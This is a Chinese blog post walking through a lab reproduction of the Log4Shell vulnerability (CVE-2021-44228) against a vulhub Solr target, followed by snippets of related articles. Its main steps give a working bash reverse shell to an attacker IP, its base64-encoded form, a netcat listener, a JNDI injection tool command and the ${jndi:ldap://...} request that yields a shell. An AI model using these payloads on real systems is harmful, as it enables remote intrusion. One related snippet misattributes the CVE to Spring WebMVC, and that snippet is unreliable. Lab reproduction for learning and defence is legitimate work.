CVE-2021-44228 log4j漏洞复现

最新推荐文章于 2024-04-23 16:52:49 发布
最新推荐文章于 2024-04-23 16:52:49 发布
阅读量414 收藏
点赞数
文章标签: log4j
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_47414541/article/details/132731795
版权
本文详细描述了如何在特定环境中复现CVE-2021-44228Log4j漏洞,包括使用工具如java-jar和nc监听端口,构造并执行payload,以及在WebLogic服务器上利用JNDI注入攻击的过程。
摘要由CSDN通过智能技术生成

CVE-2021-44228 log4j漏洞复现

【注意】本文只是记录漏洞复现的操作过程,以下仅供学习参考之目的,勿作他用,否则后果自负。

环境

靶机:ubuntu
攻击机:Kali-linux
漏洞搭建:\vulhub-master\weblogic\CVE-2023-21839

使用到的工具

  • 工具:

具体复现过程:

0、准备工作
  1. 进入攻击机kali,java -version 查看java 版本,由于工具需要低于1.8版本,而kali自带的版本过高,需切换到1.8版本,具体过程,可以参考这篇文章kali切换jdk版本,该作者写得非常清楚,此处不再赘述。
  2. 进入靶机ubuntu,进入vulhub-master\log4j\CVE-2021-44228,搭建漏洞环境,搭建成功后,在浏览器中输入:靶机IP:8983,页面如下:
    在这里插入图片描述
1、构造payload

反弹shell:bash -i >& /dev/tcp/192.168.68.150/2233 0>&1
解释:bash -i >& /dev/tcp/攻击机IP/攻击机监听端口[任意给哈] 0>&1
对payload进行base64编码:可以利用编码网站(推荐使用,更加便捷,更少出错😀),也可以通过编辑器手动编码(如果网站失效了,就手动吧😂),得到如下:bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjY4LjE1MC8yMjMzIDA+JjE}|{base64,-d}|{bash,-i}
解释:bash -c {echo,反弹shell的base64编码}|{base64,-d}|{bash,-i}

2、监听端口

打开一个cmd,输入 nc -lvvp 2233
解释:nc -lvvp 步骤1中构造payload时设置的端口
在这里插入图片描述

3、利用工具

另起一个cmd,利用工具:java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjY4LjE1MC8yMjMzIDA+JjE}|{base64,-d}|{bash,-i}" -A "192.168.68.150"
解释:java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "步骤1中构造的payload" -A "攻击机IP"
在这里插入图片描述

4、得到工具生成的payload

注意图中框出部分,复制对应版本JDK的payload
在这里插入图片描述

5、浏览器访问

浏览器访问:192.168.68.130:8983/solr/admin/cores?action=${jndi:ldap://192.168.68.150:1389/4aazyj}
解释:靶机IP:1389/solr/admin/cores?action=${jndi:步骤3中得到的payload}
(两种payload都可以,分别对应的两种协议)
在这里插入图片描述
页面返回的结果如下:
在这里插入图片描述

6、返回CMD1查看

发现服务器已经接收到返回信息
在这里插入图片描述

7、返回CMD2查看

发现已经进入到docker中的服务器命令行界面
在这里插入图片描述

weixin_47414541
关注
log4j漏洞复现(CVE-2021-44228)
qq_32445755的博客
01-13 560
Log4j 是一款开源 Java 日志记录工具。Log4j 2 是对 Log4j 的重大升级,此次漏洞的出现,正是由用于 Log4j 2 提供的 lookup 功能造成的,该功能允许开发者通过一些协议去读取相应环境中的配置。但在实现的过程中,并未对输入进行严格的判断,从而造成漏洞的发生。
Apache Log4j 远程代码执行漏洞(CVE-2021-44832)
10-25
然而,2021 年底,Log4j 发现了一个严重的安全漏洞,被称为 CVE-2021-44228(也称为 Log4Shell),这使得攻击者可以通过在日志记录中注入恶意代码来远程执行任意代码,从而对受影响的系统造成严重威胁。 此漏洞源于...
VMware VCenter 6.5.x/6.7.x log4j漏洞临时措施 (CVE-2021-44228)
shoulham的博客
12-15 1149
对VCENTER进行log4j漏洞临时措施,建议参考下面VMware的kb进行操作和验证。 https://kb.vmware.com/s/article/87081?lang=en_US 这里对其中一个步骤做下说明,无论是哪个版本的,都需要修改vMON服务,按照kb指引,是如下步骤 vMON Service 1、备份java-wrapper-vmon文件 cp -rfp /usr/lib/vmware-vmon/java-wrapper-vmon /usr/lib/vmware-vmon/java-wr
Apache Log4j 远程命令执行漏洞CVE-2021-44228
你和萤火虫有两个共同点,在我的眼里都会发光,同时,都已经很多年没见了
12-09 1363
Apache Log4j 远程命令执行漏洞CVE-2021-44228 通过jndi协议远程调用恶意类执行命令
Log4j RCE (CVE-2021-44228)】复现及原理分析
新青年1号
04-30 1304
Log4j 是 log for java 的简写,是 Apache 的开源日志记录组件。pox.xml中引入log4j依赖
log4j2漏洞复现 (CVE-2021-44228)
m0_59958467的博客
10-29 944
log4j2漏洞复现 (CVE-2021-44228)
Log4j CVE-2021-44228后续-CVE-2021-45046,CVE-2021-45105
oscar999的专栏
12-20 1171
Log4j 发现远程代码攻击漏洞CVE-2021-44228 )之后, Apache 随即发布了 2.15.0版本, 但是发布的这个版本在线程上下文查找依旧存在远程代码攻击漏洞CVE-2021-45046),于是随后又发布了 2.16.0版本; 不幸的是,两天后,Log4j 又被发现了DOS(拒绝服务)的漏洞CVE-2021-45105), 于是又发布了2.17.0 版本, 截止目前位置, Log4j 在Java 8的**安全版本是2.17.0 **。
CVE-2021-21975:Nmap脚本检查漏洞CVE-2021-21975
04-06
CVE-2021-21975 Nmap脚本检查漏洞CVE-2021-21975 漏洞参考: 博客 例子 nmap -p443 --script cve-2021-21975.nse --script-args vulns.showall IP
CVE-2021-21972:CVE-2021-21972漏洞利用
03-04
CVE-2021-21972 CVE-2021-21972工作于VMware-VCSA-all-6.7.0-8217866,VMware-VIM-all-6.7.0-8217866 :heavy_check_mark: VMware-VCSA-all-6.5.0-16613358 :heavy_check_mark:对于vCenter6.7 U2 + vCenter 6.7U2 +在...
Log4j-CVE-2021-44228漏洞复现
MrHatSec的博客
03-31 3209
Log4j-CVE-2021-44228漏洞复现
刚刚公布的 Log4J 的史诗级安全漏洞 CVE-2021-44228 你处理了吗?
weixin_45987961的博客
12-15 5360
发生什么事了 Log4J 是一个应用非常广泛的Java库,就在前两天的2021年12月10日,Log4J的一个安全漏洞被公布了。那天正好是周五,很多程序员都在计划着怎么度过一个愉快的周末,不料这个安全漏洞的公开,使得全世界很多程序员不得不周末加班,有的甚至通宵达旦紧急应对。 漏洞编号为CVE-2021-44228 ,攻击者利用这个新的零日漏洞,可以远程执行恶意代码。 零日漏洞( zero-day )通常是指还没有补丁的安全漏洞。零日漏洞利用(zero-day exploit)的程序对网络安全具有..
Apache Log4j2漏洞 (CVE-2021-44228) 分析与复现
未完成的歌~的博客
03-15 1万+
Apache Log4j2 是一个开源的 Java 日志记录工具。Log4j2 是 Log4j 的升级版本,其优异的性能被广泛的应用于各种常见的 Web 服务中。Log4j2 在特定的版本中由于启用了 lookup 功能,导致存在 JNDI 漏洞。lookup 函数是用于在日志消息中替换变量的函数,是通过配置文件中的${}语法调用的,例如:如果在日志消息中使用了,那么 log4j2 将使用 lookup 函数从系统属性中查找名为 “my.property” 的属性值,并将其替换为实际值。
【网络安全---漏洞复现log4j2漏洞详细的复现和利用过程(CVE-2021-44228)
m0_67844671的博客
09-10 3031
Log4j2远程代码执行漏洞复现(cve-2021-44228),漏洞复现详细过程,cve-2021-44228Log4j2
[漏洞复现]log4j漏洞RCE(CVE-2021-44228)
weixin_43895765的博客
12-15 7680
由于排版问题,详情见个人博客文章???? log4j漏洞RCE(CVE-2021-44228)
Log4j2漏洞复现CVE-2021-44228
热门推荐
qq_43798640的博客
12-15 3万+
Apache Log4j是一个基于Java的日志记录组件,通过重写Log4j引入了丰富的功能特性,该日志组件被广泛应用于业务系统开发,用以记录程序输入输出日志信息。Apache Log4j2存在远程代码执行漏洞,攻击者可利用该漏洞向目标服务器发送精心构造的恶意数据,触发Log4j2组件解析缺陷,实现目标服务器的任意代码执行,获得目标服务器权限。影响范围:Apache Log4j 2.x<=2.14.1。已知受影响的应用及组件,如 spring-boot-strater-log4...
[CVE-2021-44228]:log4j2漏洞复现流程详解(vulhub环境)
weixin_45441024的博客
04-23 426
Apache Log4j2是Apache软件基金会下的一个开源的基于java的日志记录工具。该远程代码执行漏洞基于攻击者使用${}关键标识触发JNDI注入漏洞,可以执行任意代码。
log4j 漏洞CVE-2021-44228 漏洞复现
kyliuw的博客
03-08 6094
log4j 漏洞CVE-2021-44228 漏洞复现
CVE-2021-44228漏洞复现
最新发布
07-27
CVE-2021-44228是一个安全漏洞,通常被称为“Spring Remote Code Execution (RCE)”,它影响了Spring Framework的一些版本,尤其是在处理恶意输入的情况下可能导致远程代码执行。这个漏洞涉及到Spring WebMVC框架中的`WebInputConverter`机制,攻击者通过精心构造的HTTP请求,可以利用该漏洞将恶意脚本注入到应用程序中。 复现实验需要以下步骤: 1. **环境搭建**:首先,你需要一个受影响的Spring应用实例,通常是运行在服务器上的,例如Tomcat或Jetty等Web容器。 2. **获取样本**:找到包含漏洞利用示例的PoC(Proof of Concept)代码,这通常包括一些特定的URL、POST数据以及可能的触发条件。 3. **模拟攻击**:创建一个本地工具(如curl、Postman或自动化测试框架),向服务器发送包含恶意payload的HTTP请求。payload可能包括JavaScript、SQL或其他能被执行的语言片段。 4. **检查响应**:观察服务器对请求的响应,如果返回了预期的异常结果或者执行了非授权的操作,那么就可能意味着复现成功。 5. **验证修复**:如果你的应用已经更新并修复了这个漏洞,尝试相同的请求,看看是否还能够触发漏洞。 请注意,实际操作时应在受控环境下进行,并确保遵守所有法律法规,切勿用于非法活动。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值